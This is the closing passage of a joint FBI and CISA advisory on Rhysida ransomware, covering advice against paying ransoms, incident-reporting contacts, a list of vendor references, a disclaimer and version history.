FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other threat actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complaint Center (IC3) at Ic3.gov, a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.

REFERENCES

  1. Microsoft: DEV-0832 (Vice Society) Opportunistic Ransomware Campaigns Impacting US Education Sector
  2. FortiGuard Labs: Ransomware Roundup – Rhysida
  3. Microsoft: Security Update Guide – CVE-2020-1472
  4. Microsoft: Master File Table (Local File Systems)
  5. SentinelOne: Rhysida
  6. Secplicity: Scratching the Surface of Rhysida Ransomware
  7. Cisco Talos: What Cisco Talos Knows about the Rhysida Ransomware
  8. SOC Radar: Rhysida Ransomware Threat Profile
  9. Sophos: A Threat Cluster’s Switch from Vice Society to Rhysida
  10. Sophos: Vice Society – Rhysida IOCs (GitHub)
  11. Check Point Research: Rhysida Ransomware – Activity and Ties to Vice Society
  12. Microsoft: Command Line Process Auditing
  13. Microsoft: Audit Process Tracking
  14. Microsoft: Remote Credential Guard

ACKNOWLEDGEMENTS

Sophos contributed to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and the MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, and the MS-ISAC.

VERSION HISTORY

November 15, 2023: Initial version.

For Emergency Cyber Security Incident Response please email RedTeam@DefendEdge.com